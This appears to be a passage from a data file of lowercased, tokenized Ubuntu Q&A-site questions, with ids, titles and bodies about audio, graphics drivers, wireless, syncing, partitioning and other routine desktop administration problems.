system.reflection.monocmethod.invoke ( bindingflags invokeattr , system.reflection.binder binder , system.object [ ] parameters , system.globalization.cultureinfo culture ) at system.reflection.constructorinfo.invoke ( system.object [ ] parameters ) at system.activator.createinstance ( system.type type , boolean nonpublic ) at system.activator.createinstance ( system.type type ) at banshee.servicestack.servicemanager.registerservice ( system.type type ) at banshee.servicestack.servicemanager.run ( ) at banshee.servicestack.application.run ( ) at banshee.gui.gtkbaseclient.initialize ( boolean registercommonservices ) at banshee.gui.gtkbaseclient..ctor ( boolean initializedefault , system.string defaulticonname ) at banshee.gui.gtkbaseclient..ctor ( ) at nereid.client..ctor ( ) at system.reflection.monocmethod.internalinvoke ( system.reflection.monocmethod , system.object , system.object [ ] , system.exception byref ) at system.reflection.monocmethod.invoke ( system.object obj , bindingflags invokeattr , system.reflection.binder binder , system.object [ ] parameters , system.globalization.cultureinfo culture ) at system.reflection.monocmethod.invoke ( bindingflags invokeattr , system.reflection.binder binder , system.object [ ] parameters , system.globalization.cultureinfo culture ) at system.reflection.constructorinfo.invoke ( system.object [ ] parameters ) at system.activator.createinstance ( system.type type , boolean nonpublic ) at system.activator.createinstance ( system.type type ) at banshee.gui.gtkbaseclient.startup ( ) at hyena.gui.cleanroomstartup.startup ( hyena.gui.startupinvocationhandler startup ) at banshee.gui.gtkbaseclient.startup ( ) at banshee.gui.gtkbaseclient.startup ( system.string [ ] args ) at nereid.client.main ( system.string [ ] args ) at system.appdomain.executeassembly ( system.appdomain , system.reflection.assembly , system.string [ ] ) at system.appdomain.executeassemblyinternal ( system.reflection.assembly a , system.string [ ] args ) at system.appdomain.executeassembly ( system.string assemblyfile , system.security.policy.evidence assemblysecurity , system.string [ ] args ) at system.appdomain.executeassembly ( system.string assemblyfile ) at booter.booter.bootclient ( system.string clientname ) at booter.booter.main ( ) yet , if i run muinshee , it works just fine . i reported a bug on launchpad , then was told to report a bug on bugzilla , but something tells me this is something wrong with my system . i tried removing ~/.config/banshee-1 , but that did n't make a difference .
63475	graphical glitches with ubuntu 11.04 x64 and catalyst	i 've had this setup since early july . the card is an amd radeon hd 6450 and i 'm using the version of catalyst which was provided in jockey . when compiz is enabled , i get problems with laggy window movement ( even with the known compiz opengl changes ) and laggy scrolling . to remedy this , i simply use classic mode with no effects . the problem here is that any video/3d/etc ( except flash stuff ) will be extremely glitchy . the window flickers and always remains in the foreground . example : http : //ubuntuone.com/6aqmscudzx78spu32jwuuk this happens with games , movies , or just about anything regarding video playback . i 'm assuming these issues are somewhat due to the fact that my gpu is fairly new . any help would be great : )
63483	ubuntu one folder vs checking the `` sync with ubuntu one '' check box	what is the difference between dragging a folder over to the ubuntu one folder for syncing and just checking the `` synchronize this folder '' check box on each folder i want to sync ?
63484	no sound coming through hdmi to tv	i just built a pc and the sound test for hdmi in phonon works but no other app does . my audio device is : ati technologies inc rs880 audio device [ radeon hd 4200 ] . i 'm running kubuntu 11.04 . it works when i plug in speakers in audio out . i can give any other hardware info if needed .
63485	problem with pulse audio with ntfs partition	im having troubles with pulseaudio . i have my home folder on an ntfs partition because i have dual boot on my netbook , and i need to share my home folder with windows . i used to have debian , and i had no problem with that , but now i moved to ubuntu 11.04 and i cant control audio with hardware keys ( fn+f12 ) . ive setted all the permissions and group owning to my user and group by properly mounting the partition via fstab : /dev/sda7 /home ntfs-3g utf8 , umask=000 , uid=1000 , gid=1000 0 1 but , when i try running pulseaudio -- start , i get the following output : e : core-util.c : failed to create secure directory : permission denied w : lock-autospawn.c : can not access autospawn lock . e : main.c : failed to acquire autospawn lock audio is working good . i can hear everything good , but i cant control sound volume through unity bar 's controls , neither through hardware keys ... any help would be really appreciated ! thanks ! = )
63486	projector not detected on a lenovo t410	i am on ubuntu 11.04 - and i have a lenovo t410 laptop . i am not able to detect a projector . ubuntu simply can not detect the projector . â ~ lspci | grep vga 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 02 ) i tried using xrandr and setting up the display but nothing works . this is a sad problem that has been reported so many times on different ubuntu forums but never fixed . is there any solution to this ?
63487	download 64bit packages in a 32bit system	i need to download some packages to install in my other machine which does n't have internet access , and has a 64-bit architecture . since this machine which has internet connection is 32-bit , it only downloads 32-bit packages with apt-get . i want to know if it is possible to : download 64 bit packages ; download those which are already present . alternatively , is it possible to get the url for these packages in a automatic way ?
63488	how to change the window color ( default : white ) ?	how to change the window color ( default : white ) in oneiric ? ( in natty , i could do it in appearance . ) ( if 1 does n't work ) how to change the background color in gedit ? ( in natty , by right clicking i could find profile or something like that . )
63489	why are documents from office 2007/2010 missing headers when opened in openoffice 3.2 ?	i am on a project to migrate windows 7 to ubuntu 10.04 but i am facing a problem . headers and footers are missing in all documents sent from windows 7 office 2007/2010 to ubuntu 10.04 with openoffice 3.2 can anyone help
63491	how do i replicate the super key ?	if you use xmonad , xbindkeys , and xdotool to try and remap the 'menu ' key , it does not work perfectly . the 'menu ' key will only emulate the super key 's quick press action , bringing up the application search . if you hold in the 'menu ' key it will not emulate the super key 's hold down action . that is , bring up the launcer with numbers over the applications . how do you make another key on the keyboard act exactly like the super key ?
63494	mouse pointer freezing up	i 'm not sure if it should be asked here or on forums but i 'll still put it up here to get discussion started , so 2 days back i upgraded to 11.10 64bit beta . there are few crashes which i already reported through bug reporting . but my mouse pointer ( laptop touchpad ) for some reason seems to be freezing up . i 'm trying to decide the reason/moment for a freeze but ca n't seem to come to conclusion . mostly when i press enter for first time ? or ctrl+enter ? < -- these are stones thrown in dark , as those are the things i mostly do after starting up . but yea , has anyone else seen/read/experienced something similar ? ohh btw my usb mouse work completely fine so i think only touchpad issue , i would appreciate if anyone know how to remove and install touchpad kernel drivers ( hopefully rmmod and modprobe ) i 'll see if that helps . my lsusb looks something like this : bus 007 device 004 : id 0a5c:4502 broadcom corp . keyboard ( boot interface subclass ) bus 007 device 005 : id 0a5c:4503 broadcom corp . mouse ( boot interface subclass ) thanks [ edit ] : other things that i noticed , power button ( on laptop ) does n't work , and shortcuts such as ctrl+alt+l does n't work
63496	disable changelog for apt-get upgrade ?	i 'm on a relatively slow network , also i do n't really care about changelogs , but each time i 'll wait for longtime till updates are installed , just for loading changelogs from remote server . how can i disable this feature ? seems that /etc/apt/apt.conf.d is only suitable for changing the url of that server .
63497	update problem with `` failed to fetch '' error	i do n't get firefox 7 update . when i try to check for updates from update manager , i get : w : failed to fetch http : //wine.budgetdedicated.com/apt/dists/edgy/main/binary-i386/packages 404 not found , w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/edgy/universe/binary-i386/packages 404 not found [ ip : 91.189.92.170 80 ] , e : some index files failed to download . they have been ignored , or old ones used instead . any idea ?
63498	is it possible to inverse partition numbers ?	that is the current configuration /dev/sda1 : ntfs primary 200gib /dev/sda3 : extended 400gib /dev/sda5 : ext4 396gib /dev/sda6 : linux-swap 4gib and that is the wanted configuration : /dev/sda1 : ntfs primary 200gib /dev/sda3 : extended 400gib /dev/sda5 : linux-swap 4gib /dev/sda6 : ext4 396gib i would like to inverse partition numbers of /dev/sda5 and /dev/sda6 .
63499	wubi windows installer downloads wrong ubuntu image	i downloaded offical ubuntu wubi installer as i wanted to install ubuntu besides my windows 7 setup . i launched it and noticed that it started download amd 64 bit ubuntu iso , while i 'm on intel and running 32bit windows . i canceled operation . how can i tell wubi installer which ubuntu system i want ?
63501	how well does wpa2 support work on an ralink rt2760 ?	i found an old post saying that wpa2 is not supported by the rtxxx ( ralink ) drivers . is this statement still accurate for 10.04 lts server ? is ndiswrapper being used automatically instead ? case specific info : i 'm attempting to use a ralink rt2760 . this card auto-configured beautifully under ubuntu 11.04 , but i have a need for 10.04 lts server , so i 'm re-imaging . $ iwconfig wlan0 rt2860 wireless essid : '' '' nickname : '' rt2860sta '' mode : auto frequency=2.412 ghz access point : not-associated bit rate : 1 mb/s rts thr : off fragment thr : off link quality=10/100 signal level:0 dbm noise level : -87 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc : 0 missed beacon:0 makes it appear that everything is working properly , yet $ iwlist scan wlan0 no scan results there are 8 discoverable networks in range .
63505	launchbar fix position	i have launchbar which moves when i remove mouse from left side , but i want it to stay there , whether i mouse over there or not ? how can i ?
63507	prevent new packages from linking start up scripts ?	how can i prevent newly installed packages from creating links in e.g /etc/rc2.d ? currently i 'm launching update-rc.d -f blabla remove /etc/rc.local each time during boot . but this should n't be necessary . i need this because i have some packages , like samba server , no need to start everytime , just start whenever i need it is fine for me .
63518	empathy new message field does not wrap to next line , but increases the window width instead	i 'm using empathy as an irc client . not sure if this affects other protocols as well . when i start typing new message in the field on the bottom of the conversation window , and the message becomes too long to fit on one line , the window starts to grow horizontally instead of the message wrapping to next line . this is very annoying when typing long message , as the window quickly grows beyond the screen edge . do n't know if this is a bug or a really obscure feature . shall i report a bug , or is there a setting somewhere to change it ?
63521	is libreoffice able to open all the word2007+mathtype documents totally correct ?	because i write many document with office word 2007 + mathtype . i 'm not request for libreoffice can edit mathtype 's equations , but i want to know libreoffice can open all the office word 2007 documents or not ?
63524	what 's the best way to pause my work in virtualbox with ubuntu as a guest ?	host os : windows 7 guest os : ubuntu 11.04 say if i wo n't need to work on the guest os for 1 hour , while having a lot of programs running and do n't want to close them . what is the best way to pause my work on the guest os ? ubuntu has suspend and hibernate . i found that hibernate wo n't work as it always fails to boot up after hibernate . for suspend , should i couple it with virtualbox pause to release the host os resources . would this cause any issue once resume the work ? since i found sometimes the guest os becomes slower resume from pause vm .
63531	how do i allow a user to login only every other day ?	i would like to allow a user to login every other day , but how would i go about doing that ? i would like it to involve as little regular action from me as possible . i tried timekpr but that does n't have the functionality and i do n't know any other way . any ideas ? thanks in advance .
63533	which sound profile will allow me to simultaneously hear and record system audio + microphone input ?	i 'm trying to screencast with both mic and system sounds at the same time . previously this did n't work , but i have found that fiddling with the sound profile brings me a step closer . to fiddle with sound profile : click on sound menu select `` sound preferences ... '' select `` hardware '' tab choose the device to configure ( i have two `` internal audio '' and `` logitech usb headset '' ) select option from profile dropdown click `` test speakers '' to test output so far so good . previously i had internal audio set to `` analog stereo duplex '' and the headset also on `` analog stereo duplex '' . when i recorded a screencast in tibesti and played it back , i could hear myself but not the system sounds ( for example , music player or skype call ) . i switched internal audio to `` digital stereo duplex ( iec958 ) '' . under the `` output '' tab i selected internal audio as the output . when i recorded a screencast in tibesti and played it back , i could hear myself and the system sounds . unfortunately , i could n't hear the system sounds while recording , which means screencasting a skype call could n't work . the internal audio profiles are : analog stereo duplex , analog stereo output , digital stereo ( iec958 ) output + analog stereo input , digital stereo duplex ( iec958 ) , digital stereo ( hdmi ) output + analog stereo input , digital stereo ( hdmi ) output , analog stereo input , off . the headset audio profiles are : analog stereo duplex , analog stereo output , analog stereo input , off . which profile combination and input/output selection will allow me to simultaneously hear and record system audio + microphone input ?
63534	per file-type preferences in gedit	i 'm trying to use gedit for two different tasks : developing python software and writing latex documents . both are based on pure text files , but they are very different : e.g . python code needs to be aligned to be able to see the structure of the code ( loops , functions , ... ) . therefore a monospace font is a good thing . for writing a latex document , i mainly need readability . this is best achieved with a font that is used in printing and definitly not a monospace font . is there a way to tell gedit to use per-file-type preferences ? e.g . garamond for *.tex and monospace for *.py ? ( but this problem is not limited to the fonts , and also not to latex and python ) .
63539	when will globalmenu start to work with gnome-shell ?	when will globalmenu start to work with gnome-shell in oneiric ? is there already a ppa or an alternate version of gnome-globalmenu that works with gnome-shell ?
63541	does windows 7 prevent ubuntu from installing ?	ubuntu dual boot window 7 with two separate hard disks in one machine for years now i 've been using xp along ubuntu on two separate hard drives without any problem . now , installing a win 7 machine with two separate hard drives again , i am not capable of successfully installing ubuntu 11.04 along with it . here 's what happens : install w7 - no problem install ubuntu 11.04 - seemingly no problem either ( via live-cd ) reboot will show the grub menu w7 boots properly ubuntu shows a messed up screen , login accepted , but ubuntu does n't start i repeated the procedure with linux mint 11 - same same : ( so i checked wit live-cds ( ubuntu , linux mint , knoppix , fedora ) . all live systems start properly , but acces to all hard drives and thumb drives is prohibited . is this a preview to a supposedly upcoming w8 feature preventing a dual boot machine or accessing the file system with live cds ? i do depend on both os - so i 'd really like to get this working . please : i 'm not a geek or developer , just a `` power user '' with good reading skills - so be kind and friendly to a normal user : d thank you !
63544	poor fps with wine ( wow )	i just recently installed ubuntu and tried to run wow on it . it runs fine , but performance is very bad compared to win7 . i do use opengl instead of dx on ubuntu set gxapi `` opengl '' also direct rendering is enabled - glxinfo | grep rendering gives me direct rendering : yes . so i think that i did everything correctly , my results differs from win7 dramatically . ubuntu ( opengl ) : avg fps 35-45 win7 ( dx9 ) : avg fps 50-60 win7 ( dx11 ) : avg fps 60-80 win7 ( opengl ) : 50 the enviroment was very still , no players running whatsoever , graphical settings were same for both platforms . is it normal ? is there any way of achieving same fps on ubuntu as on win7 or it is not possible ?
63551	not able to view gui screen in ubuntu after installing in vmware workstation 7	i have installed vmware workstation 7.1.4 on a intel core 2 duo machine running on windows 7 os . i downloaded the dvd image ubuntu-11.04-dvd-i386 from the ubuntu website and installed it on the vmware workstation . gave all the default parameters for hard disk space allocation ( 20 gb ) memory ( 1 gb ) etc . in vmware . after the installation finished , the ubuntu terminal came on showing : '' ubuntu 11.04 ubuntu tty5 ubuntu login : '' irrespective of whatever i do , i am unable to make it boot up in the gui mode . please help . it will be greatly appreciated .
63553	an immigrant from windows , please help with applications	please name the software similar to the ones i will mention from windows : internet download manager ( idm ) k-lite codec pack ( klc ) ccleaner tuneup utilities winrar
63558	how to install samsung allshare or recommendations for other dnla server options ?	how can i install samsung allshare ( a windows app ) on ubuntu 11.04 ? i have tried unsuccessfully using wine . alternatively , can you recommend other dnla server options ?
63562	how can i apply a global pedestal to pulseaudio ?	on my system , analog output works , but the volume of the headphone output is very low . internal speakers work well , and the volume level is reasonable . however , even at 150 % , the volume of headphone output is barely audible ( alsamixer command line utility also at full volume ) . is there a way to set a constant boost or pedestal to the headphone output ? what i mean is , applying a strengthening effect to the baseline to which the sound levels in the volume mixer are compared . there seem to be some reports relating to this on launchpad - does anyone know of a workaround or solution ? edit : i forgot to mention that sometimes , when the speakers are enabled ( the output is set to `` analog output '' ) , there is also sound from the headphone output - in these cases , the volume level is a-ok in the headphones as well . however , having the speakers on all the time can be a nuisance .
63565	if i 'm running a hybrid graphics card , should i disable/uninstall nvidia drivers , and what do i switch to ?	i 'm running a dell xps l502x , one of those hybrid graphics models that do n't yet `` just work '' on linux : ( when i installed ubuntu ( natty ) i just went ahead and accepted whatever options i was given , including installing the current nvidia drivers . additional drivers reports the driver as the current version , recommended , required for unity , activated , but not currently in use . however , i ca n't actually run unity , so i 'm currently running with unity 2d . ubuntu has not detected the driver as being obsolete , but i get the following when running /usr/lib/nux/unity_support_test -p : xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . error : unable to create the opengl context when i start the `` nvidia x server settings '' application , i get the following message : `` you do not appear to be using the nvidia x driver . please edit your x configuration file ( just run nvidia-xconfig as root , and restart the x server . '' i 've since been told that on these models specifically you should n't install or activate the nvidia driver . is this true , and why ? if it is true , should i uninstall the driver , and what benefits will this give me ? if i uninstall it , what should i switch to , if anything ? how do i uninstall it ? otherwise , is it safe to activate it ? in which case do i just run sudo nvidia-xconfig ? my goal here is to either : run unity just like the other kids by enabling the nvidia driver if this is required or , by doing something else and , uninstall the nvidia driver , if this is advisable ( whether or not it is required ) continue running unity 2d if unity is impossible on my machine by doing nothing ( leave the system as-is ) and , uninstall the nvidia driver , if this is advisable my goal is not ( yet ) to : get hybrid graphics working ( for example , by install bumblebee ) - it seems to me that support for this is still in development on the linux platform , so i 'll let others experiment : ) disable either the intel or nvidia card ( i want to get unity working `` the right way '' first )
63567	how to access a port on a remote server using ssh ?	i have a service running on a certain port at the server . what i want to do is , access the server using ssh and use a local ( client-side ) program to access the server 's port . is that possible ?
63574	delay shutdown until ubuntuone has finished synchronizing	when logging out to a different user , shutting down , or restarting the machine sometimes i can get this message some programs are still running program list waiting for programs to finish . interrupting these programs may cause you to lose work is there any way that ubuntu can automatically detect when these programs have completed their task before closing down ? i understand there is an issue with programs that might have crashed . but some other programs such as ubuntuone might need some additional time to sync before the system can shutdown here you are , this is the parse output . i have got no clue of what can be done with it , but i am quite excited to see some magic ! martin @ ubuntu-desktop : ~ $ u1sdtool -- status state : queue_manager connection : with user with network description : processing the commands pool is_connected : true is_error : false is_online : true queues : iddle the only difference when the daemon is syncing is the last line that can become queues : working or queues : working_on_both
63580	difference between convert -sample and convert -geometry	i was making a small guide for facebook users on mogrify and convert imagemagik subcommands , but i found that convert has -sample and -geometry options that for me look 99 % the same . what is the difference between the two ? and if by chance , how do they differ from the mogrify version of -resize , -resample , -sample , -scale ? just to make sure when to use them and why ( in case of specific formats , sizes , colors , etc.. )
63581	ubuntu one v2 for windows does n't install or run properly	i had the beta 1 installed on windows 7 , downloaded v2 and it does n't install properly as there 's no way of uninstalling it in control panel it wo n't synchronise nor start up at startup . when i click on the icon it starts ok giving me the normal dialog box but i also get a huge pop-up full of gibberish . here is a screenshot : it also says that syncing is up to date when it plainly is n't - i saved a file to my ubuntu one folder in windows today and the version on my ubuntu one web page is still showing the previous one from four weeks ago ... so how do i either completely uninstall , or fix this ?
63582	hide desktop.ini and thumbs.db files	i have ubuntu and windows 7 on my computer . now i have a problem , i want to hide the desktop.ini and thumbs.db files windows automaticly creates . i ca n't rename all files to .desktop.ini and .thumbs.db . if i do this , windows creates new desktop.ini and thumbs.db files . adding those files in the `` .hidden '' file in the home directory do n't help me either . how can i hide desktop.ini and thumbs.db in directories when i use ubuntu ?
63585	how to uninstall ubuntu software center in 11.10 ?	i am trying to uninstall software center for ubuntu oneric using the command sudo apt-get remove software center and get this as result reading package lists ... done building dependency tree reading state information ... done e : unable to locate package software e : unable to locate package center i did it once and got it fixed but now it does't work . i have an issue with the software center it keeps on repeatedly giving message saying send error .
63588	how do i get fan control working ?	i know there something called fancontrol , that enables you to control the speed of your system 's ventilation . i 'd like to let my fans spin a bit faster as my laptop is heating up very easilly . all tutorials and stuff i 've found are for old versions of ubuntu and do n't seem to be working anymore . can anyone explain to me or give me a good link on how i can get it working on ubuntu ? something different with the same effect is also fine .
63592	filezilla uploads at 80kb/sec max	am trying to upload files with filezilla to my server and the upload is somehow limited to 80kib . the server can take up to 4mib in upload and my connection has a 512kib upload . what should i check to see what the problem is .
63594	mount encrypted volumes from command line ?	if i have an encrypted external disk ( or an internal disk that is not in fstab ) , i see an entry for it in nautilus -- with an entry like `` x gb encrypted volume '' . i can click on this volume , and am prompted for a password to decrypt and mount the device . but how do i do this from the command line ? this wiki page , and other docs i can find , only refer to gui methods of decrypting the device ; but this wo n't do in the context of headless servers or ssh logins . is there a simple way to get devices to mount to automatic locations in `` /media '' just like they would with the gui ? ( i 'm not asking about encrypted home directories -- i 'm aware of ecryptfs-mount-private . this question is about additional encrypted volumes . )
63599	configuring hdmi audio via command line	i 'm looking for a way to configure hdmi audio output via the command line using pulseaudio . i was able to get it running by using pavucontrol and changing it in the configuration tab , but i need a way to automate the process . i have n't been able to find any documentation at all so far . the system is a lucid install . edit : from what i 've found , i can use pacmd set-card-profile to do this . however , whenever i try , i get an error like the following ( using the default profiles as defined in /usr/share/pulseaudio/alsa-mixer/profile-sets/default.conf ) # pacmd set-card-profile 0 hdmi-stereo welcome to pulseaudio ! use `` help '' for usage information . > > > failed to set card profile to 'hdmi-stereo ' . # pacmd set-card-profile 0 analog-stereo welcome to pulseaudio ! use `` help '' for usage information . > > > failed to set card profile to 'analog-stereo ' . why ca n't i change these from command line when pavucontrol works to change them ?
63603	can you please add other folders back to sync options back to ubuntu one in windows ?	upgraded from the beta client to release 2 and now find that my old folders on my d : drive can no longer be added , only folders under my c : /docs and settings/user . i have a separate drive for data and this is where my documents resides .
63605	ca n't boot into windows 7 after installing 11.10	i just installed ubuntu 11.10 beta2 along with windows 7 but after installation i am not getting the boot menu and i straight away boot into ubuntu . kindly help.. ! ! !
63609	change to ubuntu server or stay with ubuntu	i have an ubuntu pc ( 10.04 ) which i plan to use as a home server . it 's main use will be nas and media server with mediatomb . should i : backup and reformat pc , and install ubuntu server . leave it how it is , and just install necessary software . i 've been using this pc as my main computer for three years+ now , so there is a lot installed . but i do n't have much time to properly do option 1 .
63610	how do i remove `` ubuntu '' in the bios boot menu ? ( uefi )	see this ubuntu appears in bios menu i have this on my lenovo s205 too . is there some way to remove `` ubuntu '' from the menu ? i do n't even have it installed anymore .
63619	514 authentication required when using tor	i have installed vidalia and when i activate tor and set the proxies in firefox i get the message '514 authentication required. ' ! i 'm wondering what is the problem here ?
63621	iscsi_trgt missing because ca n't build kernel module	when attempting to start the iscsitarget service , i get fatal : module iscsi_trgt not found . trying to build module using instructions from http : //sourceforge.net/apps/mediawiki/iscsitarget/index.php ? title=unofficial_debs fails and the build log only has a single line in it saying the build started . nothing about the failure .
63633	running programs are not displayed in the panel	my wifes computer is running ubuntu 10.04 . since several days the running programs are not displayed on the panel . with alt tab you can still switch between open programs . any idea what happened ?
63640	changing the resolution to 1440x900	the output of `` xrandr '' yasith @ vostro : ~ $ xrandr screen 0 : minimum 320 x 200 , current 1366 x 768 , maximum 8192 x 8192 lvds1 connected 1366x768+0+0 ( normal left inverted right x axis y axis ) 293mm x 165mm 1366x768 60.0*+ 40.0 1360x768 59.8 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 disconnected ( normal left inverted right x axis y axis ) hdmi1 disconnected ( normal left inverted right x axis y axis ) dp1 disconnected ( normal left inverted right x axis y axis ) then i ran , xrandr -- newmode `` 1440x900_60.00 '' 106.50 1440 1528 1672 1904 900 903 909 934 -hsync +vsync to create a new mode . then when i try to set that mode to lvds1 using the following command i get an error . yasith @ vostro : ~ $ xrandr -- addmode lvds1 1440x900_60.00 x error of failed request : badmatch ( invalid parameter attributes ) major opcode of failed request : 150 ( randr ) minor opcode of failed request : 18 ( rraddoutputmode ) serial number of failed request : 29 current serial number in output stream : 30 any help on this would be greatly appreciated .
63641	how can i launch an application at startup just in a determined session ?	i set up my gnome session to use tint2 as a window list panel , but i do n't need it when using xfce , therefore i 'd like to have tint2 start only under `` classic ubuntu '' session . is this possible ? editing the startup applications has effect on both sessions . thanks for your help !
63646	ca n't browse the internet although i can ping www.google.com	i have a pc running ubuntu 11.04 with 2 nics . eth0 is internet and eth1 in internal lan . eth0 is connected to the internet talks and receives the correct dhcp addresses from isp . i can from this computer ping the dns servers at my isp , i can ping www.google.com and any other sites so the dsn 's are working fine . i have a dhcp server on the lan side that serves up the ip addresses to my computers connected to the internal lan . i have a firewall between the two nics ( eth0 and eth1 ) . this computer is also the gateway for my internal lan computers to access the internet . what is more baffling is that any lan side computer ( these are different flavours of operating systems i.e . ubuntu 10.04 , mac snow leopard , windows xp ) all work fine , they can get to browse the internet using a range of browsers ( firefox v3.6.22 , safari , & ie ) but here is the problem - the gateway computer ca n't browse the internet - this is the one that is running ubuntu 11.04 , firefox 6.0.2. it also has a problem with even the ubuntu software centre which it ca n't download programs . help is needed and it would be greatly appreciated , i 've tried the usual stuff that is recorded on the forums like ipv6 etc . but all my other computers go through this one and they have no problems - it must be something to do with ubuntu 11.04. very puzzling ... please help . cheers jj
63648	how do i install this patched b43 driver ?	recently i purchased a macbook pro that has a bcm4331 802.11a/b/g/n wifi card that does not work with the default kernel . sudo dmidecode -s system-product-name macbookpro8,2 lspci |grep 4331 03:00.0 network controller : broadcom corporation bcm4331 802.11a/b/g/n ( rev 02 ) lspci -n |grep 4331 03:00.0 0280 : 14e4:4331 ( rev 02 ) after doing some initial research i came across this article that gave step by step instructions on patching the latest compat-wireless which should support the 4331 device : however , following those instructions results in the following dmesg errors when i attempt to modprobe the patched module into the latest ubuntu 11.10 kernel ( 3.0.0-12-generic ) [ 5373.408581 ] b43 : unknown symbol bcma_core_disable ( err [ 5373.408685 ] b43 : unknown symbol bcma_core_pll_ctl ( err 0 ) [ 5373.408695 ] b43 : disagrees about version of symbol bcma_driver_unregister [ 5373.408698 ] b43 : unknown symbol bcma_driver_unregister ( err -22 ) [ 5373.408712 ] b43 : disagrees about version of symbol bcma_core_enable [ 5373.408715 ] b43 : unknown symbol bcma_core_enable ( err -22 ) [ 5373.408727 ] b43 : disagrees about version of symbol bcma_core_is_enabled [ 5373.408730 ] b43 : unknown symbol bcma_core_is_enabled ( err -22 ) [ 5373.408745 ] b43 : disagrees about version of symbol bcma_chipco_gpio_control [ 5373.408747 ] b43 : unknown symbol bcma_chipco_gpio_control ( err -22 ) [ 5373.408782 ] b43 : disagrees about version of symbol__bcma_driver_register [ 5373.408784 ] b43 : unknown symbol __bcma_driver_register ( err -22 ) [ 5373.408796 ] b43 : unknown symbol bcma_core_set_clockmode ( err 0 ) [ 5373.408822 ] b43 : unknown symbol bcma_core_dma_translation ( err 0 ) [ 5373.408878 ] b43 : unknown symbol bcma_core_pci_irq_ctl ( err 0 ) can anyone point me in the right direction to help get this module to load properly ?
63649	how do i make usb sticks not ever use any write cache ?	that is , i want to be able to pluck them out anytime without worrying if data will be lost . i want every write to actually be written immediately .
63652	grldr missing error at startup	when i start ubuntu10.10 which is installed in parallel to windows7 it shows an error can not find grldr . press ctrl+alt+del to restart . how can i fix it and recover my data as i 'd installed various software by spending a lot of time . what is the main cause of happening this ? i 'd encounter this problem 4th time .
63657	sending all outgoing tcp packets through tor	i want to make all outgoing tcp packets on my ubuntu 10.04 computer anonymous . is this possible ? if so , how would i configure my computer to do this ? i 've installed tor , but it does n't work because i 'm running my computer strictly from command line . could protecting my identity be achieved another way ?
63659	how can i take screenshots from inside a fullscreen program ?	normally , i hit my `` print screen '' key , and this wonderful thing appears . however , i have no such luck in fullscreen programs . nothing happens . no wonderful little screenshot helper , no clipboard content . how can i take screenshots of fullscreen programs ?
63664	alternative to broadcom sta wireless driver	i 'm running ubuntu 10.04 on a macbook pro 5.5 . everything has worked nearly flawlessly , with the exception of the wireless . i can not describe how poor the proprietary broadcom driver is . i 'm unable to connect to about half the wifi hotspots i encounter . after i suspend , i ca n't connect to 99 % of hotspots i encounter . i compare this to my android smartphone , whose wifi is able to connect to 100 % of hotspots that my macbook ca n't connect to . i 've found only after a fresh restart is my wifi at all reliable . does anyone know of , or have experience with alternative broadcom wifi drivers ? the proprietary one is unfortunately the recommended choice in all the wiki docs i 've found concerning macbooks . edit : i tried the procedure outlined here but it did not work . it consisted of : sudo apt-get install broadcom-sta-common broadcom-sta-source sudo m-a a-i broadcom-sta sudo /etc/init.d/networking restart sudo service network-manager restart sudo shutdown -r now but after reboot ... no wireless devices listed ... edit : looking in /etc/modprobe.d , i found the following files that appear to block blacklist the b43 module . the file blacklist-bcm43.conf comments that 's it autogenerated by the bcmwl package , but i do n't know where the others are coming from ( i might have added the myself a long time ago ) . /etc/modprobe.d/blacklist-bcm43.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/broadcom-sta-common.conf
63665	why ca n't i launch eclipse from a terminal or run it via gmrun ?	i ca n't launch eclipse from either terminal or gmrun but i can do so using applications - > programming - > eclipse . here are the screenshots : 1 ) using gmrun : i can see that gmrun is recognizing the eclipse command but when i enter it , nothing happens . 2 ) using terminal : when i type eclipse , i get the following message : thanks !
63666	why does caps lock still toggle character case after i enabled `` make caps lock an additional esc key '' in keyboard settings ?	i want to have both the esc key and the caps lock key to act as an escape key . however , if i enable `` make caps lock an additional esc key '' in the keyboard > layout > options , then the caps lock key works as if it was both caps lock and escape . ie . it sendts ctrl- [ in vi , but at the same time it continues to toggle case . i have tried to fiddle with the settings in gconf-editor > desktop > gnome > peripherals > kbd , but to no avail . how do i achieve the behavior i am looking for ?
63668	what is easiest solution for twisted cable connection between two pcs running ubuntu	i plan to change os on my other pc from windows xp to ubuntu and want to have access to it . basically please imagine two pcs , each running ubuntu 11.04 and connected together with twisted cable ( ethernet ) . i want to be able to access filesystems in both directions ( from either pc to other ) in the easiest possible way . update : i just installed ubuntu ( decided to dual-boot as first ) , and the process went flawlessly , gparted resized partions with ease and overall everything was smooth , which i did not expect when computer tasks are in question .
63676	remote desktop from mac to ubuntu without logging in first ?	this has been asked before but i dont see a response just yet . i was wondering if there is a way to remote desktop from my mac to ubuntu 11.04 without logging in first ? my ubuntu is set up as my media server , and occasionally i need to screen share . so far i am able to do it successfully from apple screen share if my ubuntu user is logged in . however , if ubuntu is at the screen prompting username and password to login , screen share will not connect . i am able to login via terminal after i ssh , but it wont work unless the user is actually logged in . any help would be appreciated , its annoying to keep connecting a monitor just to log in .
63681	how can i make xrandr customization permanent ?	i used to edit the startup script for the gdm ( /etc/gdm/init/default ) to permanently change my display resolution . how can i do this with ligthdm in ubuntu oneiric ?
63682	how do i configure mplayer to always use vdpau ?	i just learned how to use mplayer to take advantage of vdpau from the command line with the -vc ffh264vdpau switch . how do i set that config in my .mplayer/config file so i do n't have to remember that long flag every time i want to watch a file ?
63685	what is the default 'backup ' user for ?	i am setting up multiple-machine backup plan and i was hoping to use a user called 'backup ' on each machine as the backup destination . my problem is , there is already a user called 'backup ' on my machine . what is it for , and can i hijack it for my own purposes ? root @ frodo : ~ # useradd backup useradd : user 'backup ' already exists
63686	krusader custom view matching more than one pattern	i one directory i have 100 files , but i only work with 10. is it possible to make custom view that matches many patterns ? for example i want to match files that start with super , but also those which start with extra
63689	upnp server for ip web cam	i have a ip webcam and i want to serve the stream by a upnp server . what i need to do is simply ; define a upnp device with the source url of ip web cam . can you suggest such tool or script to do so ? regards .
